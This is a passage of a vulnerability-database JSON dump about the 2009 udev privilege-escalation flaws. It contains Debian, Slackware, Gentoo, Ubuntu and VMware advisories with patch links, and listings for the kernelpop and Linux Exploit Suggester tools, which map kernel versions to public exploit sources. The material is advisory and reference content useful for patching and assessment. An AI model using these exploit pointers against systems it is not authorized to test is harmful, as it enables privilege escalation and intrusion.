18832 d37c3f79c808b6b775e9b5e82c265cdc\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_powerpc.deb\n Size/MD5 checksum: 65400 e1030bc12fcca0cf4ca2f4000a9d732e\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_powerpc.deb\n Size/MD5 checksum: 283004 083d7593e935231bfbc1868d54be6899\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_s390.deb\n Size/MD5 checksum: 66024 63704d890de325cce6d3ab739bfcc5df\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_s390.deb\n Size/MD5 checksum: 280362 68985aade59854bea6933ba6b9825152\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_s390.udeb\n Size/MD5 checksum: 119284 b89e7a4ae300862b138c65d1a65f5861\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_s390.deb\n Size/MD5 checksum: 19968 8176690f76660c6dfdbb9d0a0ad1c85b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.105-4etch1_sparc.udeb\n Size/MD5 checksum: 108102 09f683e56ddcf705f6b0f1ff1465299a\n http://security.debian.org/pool/updates/main/u/udev/udev_0.105-4etch1_sparc.deb\n Size/MD5 checksum: 261794 0c02b3cc77b22cc7ec88c424bc5342ab\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.105-4etch1_sparc.deb\n Size/MD5 checksum: 66058 44da6bfe900da48fd4ac0b367846c23b\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.105-4etch1_sparc.deb\n Size/MD5 checksum: 18924 2871710daab3972cda3485866c1ff0f7\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1.diff.gz\n Size/MD5 checksum: 63221 1cdb4f78dc7cf5c5702fa69e3f528724\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125.orig.tar.gz\n Size/MD5 checksum: 254564 be98e04cefdd9ca76b8fe7e92735ce29\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1.dsc\n Size/MD5 checksum: 1031 3c1c71e9321ee24dcbb4237bda82ecf8\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_alpha.deb\n Size/MD5 checksum: 81916 0d0d955ef294f83409f7729287911834\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_alpha.udeb\n Size/MD5 checksum: 148990 83667ad6d0c6d0c43ddd851d139f1fd6\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_alpha.deb\n Size/MD5 checksum: 281758 61570a51644b3470c4ca8306f6531d2f\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_alpha.deb\n Size/MD5 checksum: 2436 82668adc7df4b743eff35e1c353f5101\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_amd64.udeb\n Size/MD5 checksum: 128220 6951de1f9f2a952c718c6322d4cc041c\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_amd64.deb\n Size/MD5 checksum: 266322 d25ceb9d564f9ff30cc841432588d11a\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_amd64.deb\n Size/MD5 checksum: 2426 c04b51779d612328c0e63048ae9112e2\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_amd64.deb\n Size/MD5 checksum: 77548 68d9da089db647fed48a5e2e126109a0\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_arm.deb\n Size/MD5 checksum: 79020 8990da78870b19da2123a246308b9f42\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_arm.udeb\n Size/MD5 checksum: 123542 64e28579a5dd7f20902b4683c1c2d717\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_arm.deb\n Size/MD5 checksum: 2438 6749f4622bebfb95248e522d031ac012\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_arm.deb\n Size/MD5 checksum: 257106 80d322c9d53711a0fee58af3d027e32d\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_armel.deb\n Size/MD5 checksum: 2440 27ff9848ed16db7e8c5ca75f0a022403\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_armel.deb\n Size/MD5 checksum: 258074 fce468ead3db83d21356f1da16e50e9d\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_armel.udeb\n Size/MD5 checksum: 124506 2eb7a09d5ee3b5c308ac221851fc1573\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_armel.deb\n Size/MD5 checksum: 79228 2c16ecd4418d9fcd3f6dadf85fab95bb\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_hppa.deb\n Size/MD5 checksum: 84240 5f32416e51f5ee674c8331429bcd71ad\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_hppa.deb\n Size/MD5 checksum: 274388 9464fdcd2dac50388cf23d2e891fa903\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_hppa.udeb\n Size/MD5 checksum: 142578 18523c4afa6e272ed8449dc433bb68ce\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_hppa.deb\n Size/MD5 checksum: 2438 187adc54d95719c8bf2a20c73b9b820a\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_i386.deb\n Size/MD5 checksum: 253168 9667472701f5f78e75f944afe4e18a1f\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_i386.deb\n Size/MD5 checksum: 76280 c9f04437d9c090e54fdfaf4c08b04273\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_i386.udeb\n Size/MD5 checksum: 115724 05843396641d6e8eed4d417020969f23\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_i386.deb\n Size/MD5 checksum: 2426 ea4c748d93da3e0ffd9c070461fb9ea4\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_ia64.deb\n Size/MD5 checksum: 85644 2594d69577d4d309f6be2878524641f2\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_ia64.udeb\n Size/MD5 checksum: 190230 a682ed3c0b26b059740b37ac0976bd93\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_ia64.deb\n Size/MD5 checksum: 2432 0c4b9c1716892330ff482e8a8cb2f12d\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_ia64.deb\n Size/MD5 checksum: 324656 efa495e7fc30164bb91958f81a5f0e02\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_mips.udeb\n Size/MD5 checksum: 135612 f596cc4d41bf41fa78d25deae191df8a\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_mips.deb\n Size/MD5 checksum: 2436 ef6056a525dd10b577dcf3ac162cad18\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_mips.deb\n Size/MD5 checksum: 78790 50b801e86b6a29fedac17aa4012cc222\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_mips.deb\n Size/MD5 checksum: 270716 15cea80dfc523e1ffadcf609293be4d6\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_mipsel.deb\n Size/MD5 checksum: 2438 51d32dfc43f95c2579e989d332c6837e\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_mipsel.udeb\n Size/MD5 checksum: 135566 8a7d0840ba79647dad206aeea62dbc4e\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_mipsel.deb\n Size/MD5 checksum: 78640 e7197dd434ba99f4bef46f7176b458f1\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_mipsel.deb\n Size/MD5 checksum: 270760 53926589b10466163d5ea90008de5b8c\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_powerpc.deb\n Size/MD5 checksum: 272424 7a9d2807d73e0da05171d50882bb2b44\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_powerpc.udeb\n Size/MD5 checksum: 129696 4e24c200eaf8b615603cc7319b449f30\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_powerpc.deb\n Size/MD5 checksum: 2442 a0d04b0bf5d8278796d276568940084e\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_powerpc.deb\n Size/MD5 checksum: 79194 bb40fe52920ee2bfc65f1243ced8268f\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_s390.deb\n Size/MD5 checksum: 79448 d17034c5d4f29b21f9f6affcc8c31cf3\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_s390.udeb\n Size/MD5 checksum: 133264 e34bae7a1639cccb63814f96a014cd37\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_s390.deb\n Size/MD5 checksum: 2428 d88d5d9eedc3c5d1bfb2f441d948f9ef\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_s390.deb\n Size/MD5 checksum: 271886 9eaba049c1bbdf7903fbe52efd296f5b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/u/udev/udev_0.125-7+lenny1_sparc.deb\n Size/MD5 checksum: 259536 409b46996745484d7514739cfb4cca6e\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id0_0.125-7+lenny1_sparc.deb\n Size/MD5 checksum: 79640 2cc666f27b22a986c6ef5677509e13ad\n http://security.debian.org/pool/updates/main/u/udev/libvolume-id-dev_0.125-7+lenny1_sparc.deb\n Size/MD5 checksum: 2436 3c928f720d5a3cd021b633f8070ddfd6\n http://security.debian.org/pool/updates/main/u/udev/udev-udeb_0.125-7+lenny1_sparc.udeb\n Size/MD5 checksum: 124598 a93970f05ff0c1a9b670e5dd3bacdad8\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2009-04-16T10:30:59", "type": "debian", "title": "[SECURITY] [DSA 1772-1] New udev packages fix privilege escalation", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-16T10:30:59", "id": "DEBIAN:DSA-1772-1:31DE4", "href": "https://lists.debian.org/debian-security-announce/2009/msg00083.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:17", "description": "New udev packages are available for Slackware 10.2, 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\n\nThe udev packages in Slackware 10.2, 11.0, 12.0, 12.1, 12.2, and -current\ncontained a local root hole vulnerability:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185\n\nThe udev packages in Slackware 12.0, 12.1, 12.2, and -current had an integer\noverflow which could result in a denial of service:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186\n\nNote that udev is only used with 2.6 kernels, which are not used by default\nwith Slackware 10.2 and 11.0.\n\n\nHere are the details from the Slackware 12.2 ChangeLog:\n\npatches/packages/udev-141-i486-1_slack12.2.tgz:\n Upgraded to udev-141.\n This upgrade fixes a local root hole and a denial of service issue.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1186\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/udev-064-i486-4_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/udev-097-i486-11_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/udev-111-i486-6_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/udev-118-i486-4_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/udev-141-i486-1_slack12.2.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/udev-141-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 package:\n4bfa5de16024b6d5ddfe19aea0794bef udev-064-i486-4_slack10.2.tgz\n\nSlackware 11.0 package:\n024033959fd5586079de2daacec96eb1 udev-097-i486-11_slack11.0.tgz\n\nSlackware 12.0 package:\nda24ba5c832c38d96ea87fbd4997e20b udev-111-i486-6_slack12.0.tgz\n\nSlackware 12.1 package:\n7068aab244ff3df7775ba1bc6b75b409 udev-118-i486-4_slack12.1.tgz\n\nSlackware 12.2 package:\n7be35f9ebfce6c1512f083d57c913ea1 udev-141-i486-1_slack12.2.tgz\n\nSlackware -current package:\n53b946e0313fda94686e4bde19271072 udev-141-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg udev-141-i486-1_slack12.2.tgz\n\nThen, restart udev:\n > sh /etc/rc.d/rc.udev restart", "cvss3": {}, "published": "2009-04-20T22:36:50", "type": "slackware", "title": "udev", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-20T22:36:50", "id": "SSA-2009-111-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.446399", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2023-06-03T15:09:32", "description": "### Background\n\nudev is the device manager used in the Linux 2.6 kernel series. \n\n### Description\n\nSebastian Krahmer of SUSE discovered the following two vulnerabilities: \n\n * udev does not verify the origin of NETLINK messages properly (CVE-2009-1185).\n * A buffer overflow exists in the util_path_encode() function in lib/libudev-util.c (CVE-2009-1186).\n\n### Impact\n\nA local attacker could gain root privileges by sending specially crafted NETLINK messages to udev or cause a Denial of Service. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll udev users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-fs/udev-124-r2\"", "cvss3": {}, "published": "2009-04-18T00:00:00", "type": "gentoo", "title": "udev: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-18T00:00:00", "id": "GLSA-200904-18", "href": "https://security.gentoo.org/glsa/200904-18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2023-06-03T16:04:16", "description": "## Releases\n\n * Ubuntu 8.10 \n * Ubuntu 8.04 \n * Ubuntu 7.10 \n * Ubuntu 6.06 \n\n## Packages\n\n * udev \\- \n\nSebastian Krahmer discovered that udev did not correctly validate netlink \nmessage senders. A local attacker could send specially crafted messages \nto udev in order to gain root privileges. (CVE-2009-1185)\n\nSebastian Krahmer discovered a buffer overflow in the path encoding routines \nin udev. A local attacker could exploit this to crash udev, leading to a \ndenial of service. (CVE-2009-1186)\n", "cvss3": {}, "published": "2009-04-15T00:00:00", "type": "ubuntu", "title": "udev vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-1186"], "modified": "2009-04-15T00:00:00", "id": "USN-758-1", "href": "https://ubuntu.com/security/notices/USN-758-1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2023-06-04T15:28:28", "description": "a. Service Console package udevA vulnerability in the udev program did not verify whether a NETLINKmessage originates from kernel space, which allows local users togain privileges by sending a NETLINK message from user space.The Common Vulnerabilities and Exposures Project (cve.mitre.org)has assigned the name CVE-2009-1185 to this issue.Please see http://kb.vmware.com/kb/1011786 for details.The following table lists what action remediates the vulnerability(column 4) if a solution is available.", "cvss3": {}, "published": "2009-07-10T00:00:00", "type": "vmware", "title": "ESX Service Console updates for udev, sudo, and curl", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-0034", "CVE-2009-0037", "CVE-2009-1185"], "modified": "2009-07-10T00:00:00", "id": "VMSA-2009-0009", "href": "https://www.vmware.com/security/advisories/VMSA-2009-0009.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2023-06-04T15:11:16", "description": "[](<https://3.bp.blogspot.com/-krC2DnXScOc/Wfog2z5NwBI/AAAAAAAAJSo/yxDzXGyMf9QlICLdgsyCRCEPLUF6EMRmwCLcBGAs/s1600/kernelpop_1_old_kernel.png>)\n\n \n\n\nkernelpop is a framework for performing automated kernel exploit [enumeration](<https://www.kitploit.com/search/label/Enumeration>) on Linux, Mac, and [Windows](<https://www.kitploit.com/search/label/Windows>) hosts.\n\n \n**Requirements** \n`python3` \n \n**Currently supported CVE's:** \n*`CVE-2017-1000367` \n*`CVE-2017-1000112` \n*`CVE-2017-7308` \n*`CVE-2017-6074` \n*`CVE-2017-5123` \n*`CVE-2016-5195` \n*`CVE-2016-2384` \n*`CVE-2016-0728` \n*`CVE-2015-7547` \n*`CVE-2015-1328` \n*`CVE-2014-4699` \n*`CVE-2014-4014` \n*`CVE-2014-3153` \n*`CVE-2014-0196` \n*`CVE-2009-1185` \n \n**Run modes** \n \n**default mode** \n\n\nThe `default` mode runs with the command `python3 kernelpop.py`. This [processes](<https://www.kitploit.com/search/label/Processes>) information about the host kernel and compares it to the known kernel [exploits](<https://www.kitploit.com/search/label/Exploits>) available to the program. It then outputs a list of potentially useful [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) and attached exploits.\n\n \n\n\n[](<https://4.bp.blogspot.com/-TQA3iJ74wM4/Wfog_IjCpnI/AAAAAAAAJSs/xRA3AqbYVKAkwfyIMTeJF6k1b_AT_kazwCLcBGAs/s1600/kernelpop_2_default_mode.png>)\n\n \n**brute-enumeration mode** \n\n\nThe `brute-enumeration` mode performs the same checks, but then goes beyond and checks the computer for exploit prerequisites to see if the operating system is set up in the required vulnerable state for successful exploitation.\n\n \n \n\n\n[](<https://2.bp.blogspot.com/-AqLGpOsBolM/Wfog_nZK5FI/AAAAAAAAJS0/zf3DWkPIs-YEln75rFLZ_-RBIW9KKp2pACEwYBhgL/s1600/kernelpop_3_brute_mode.png>)\n\n \n\n\n**input mode**\n\nThe `input` mode allows you to perform [enumeration](<https://www.kitploit.com/search/label/Enumeration>) with just the output of a `uname -a` command, which makes it useful as a host-side enumeration tool.\n\n \n\n\n[](<https://4.bp.blogspot.com/-ZcYr2_oOJtA/Wfog_Xhq4uI/AAAAAAAAJSw/QWKi6cPoK64g692JZNOWOMJve5zhbEaqACEwYBhgL/s1600/kernelpop_4_input_mode.png>)\n\n \n \n\n\nOne feature currently only partially implemented is `brute-exploit` mode. This is set to prepare, compile, and run exploits in order to confirm an exploitable kernel. However, as of now it would only run on the box the program is executed on. Given that this is a fairly large project to bring on to someone else's computer, and makes considerable noise when compiling and checking exploit attempts, it would be poor OPSEC to use in an actual engagement. At some point in the future, I would like to integrate it into my other project [pysploit](<https://github.com/spencerdodd/pysploit>) for enumeration and the reckless, noisy, exploity `brute-exploit` mode.\n\n \n**Exploit sources** \n`https://github.com/SecWiki/linux-kernel-exploits` \n`https://www.exploit-db.com/local/` \n`https://github.com/SecWiki/windows-kernel-exploits` \n \n \n\n\n**[Download kernelpop](<https://github.com/spencerdodd/kernelpop>)**\n", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-11-04T13:30:00", "type": "kitploit", "title": "Kernelpop - Kernel Privilege Escalation Enumeration And Exploitation Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2014-0196", "CVE-2014-3153", "CVE-2014-4014", "CVE-2014-4699", "CVE-2015-1328", "CVE-2015-7547", "CVE-2016-0728", "CVE-2016-2384", "CVE-2016-5195", "CVE-2017-1000112", "CVE-2017-1000367", "CVE-2017-5123", "CVE-2017-6074", "CVE-2017-7308"], "modified": "2017-11-04T13:30:03", "id": "KITPLOIT:4462385753504235463", "href": "http://www.kitploit.com/2017/11/kernelpop-kernel-privilege-escalation.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-04T15:13:18", "description": "[](<https://1.bp.blogspot.com/-jjNBJYYYOfM/Uh6Zsnl9R8I/AAAAAAAAA7s/ILYnNooO8lA/s1600/perl.jpg>)Linux Exploit Suggester; based on operating system release number.\n\n \n\n\nThis program run without arguments will perform a 'uname -r' to grab the Linux Operating Systems release version, and return a suggestive list of possible exploits. Nothing fancy, so a patched/back-ported patch may fool this script.\n\n \n\n\nAdditionally possible to provide '-k' flag to manually enter the Kernel Version/Operating System Release Version.\n\n \n\n\nThis script has been extremely useful on site and in exams. Now Open-sourced under GPLv2.\n\n \nSample Output \n\n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 3.0.0\n \n Kernel local: 3.0.0\n \n Possible Exploits:\n [+] semtex\n CVE-2013-2094\n Source: www.exploit-db.com/download/25444/\u200e\n [+] memodipper\n CVE-2012-0056\n Source: http://www.exploit-db.com/exploits/18411/\n [+] perf_swevent\n CVE-2013-2094\n Source: http://www.exploit-db.com/download/26131\n \n \n \n $ perl ./Linux_Exploit_Suggester.pl -k 2.6.28\n \n Kernel local: 2.6.28\n \n Possible Exploits:\n [+] sock_sendpage2\n Alt: proto_ops CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9436\n [+] half_nelson3\n Alt: econet CVE-2010-4073\n Source: http://www.exploit-db.com/exploits/17787/\n [+] reiserfs\n CVE-2010-1146\n Source: http://www.exploit-db.com/exploits/12130/\n [+] pktcdvd\n CVE-2010-3437\n Source: http://www.exploit-db.com/exploits/15150/\n [+] american-sign-language\n CVE-2010-4347\n Source: http://www.securityfocus.com/bid/45408/\n [+] half_nelson\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/6851\n [+] udev\n Alt: udev <1.4.1 CVE-2009-1185\n Source: http://www.exploit-db.com/exploits/8478\n [+] do_pages_move\n Alt: sieve CVE-2010-0415\n Source: Spenders Enlightenment\n [+] pipe.c_32bit\n CVE-2009-3547\n Source: http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c\n [+] exit_notify\n Source: http://www.exploit-db.com/exploits/8369\n [+] can_bcm\n CVE-2010-2959\n Source: http://www.exploit-db.com/exploits/14814/\n [+] ptrace_kmod2\n Alt: ia32syscall,robert_you_suck CVE-2010-3301\n Source: http://www.exploit-db.com/exploits/15023/\n [+] half_nelson1\n Alt: econet CVE-2010-3848\n Source: http://www.exploit-db.com/exploits/17787/\n [+] half_nelson2\n Alt: econet CVE-2010-3850\n Source: http://www.exploit-db.com/exploits/17787/\n [+] sock_sendpage\n Alt: wunderbar_emporium CVE-2009-2692\n Source: http://www.exploit-db.com/exploits/9435\n [+] video4linux\n CVE-2010-3081\n Source: http://www.exploit-db.com/exploits/15024/\n \n\n \n\n\n[**Download Linux Exploit Suggester**](<https://github.com/PenturaLabs/Linux_Exploit_Suggester>)\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-08-29T00:48:00", "type": "kitploit", "title": "[Linux Exploit Suggester] Grab the Linux Operating Systems release version, and return a suggestive list of possible exploits", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-1185", "CVE-2009-2692", "CVE-2009-3547", "CVE-2010-0415", "CVE-2010-1146", "CVE-2010-2959", "CVE-2010-3081", "CVE-2010-3301", "CVE-2010-3437", "CVE-2010-3848", "CVE-2010-3850", "CVE-2010-4073", "CVE-2010-4347", "CVE-2012-0056", "CVE-2013-2094"], "modified": "2013-08-29T00:48:05", "id": "KITPLOIT:5310354020898253604", "href": 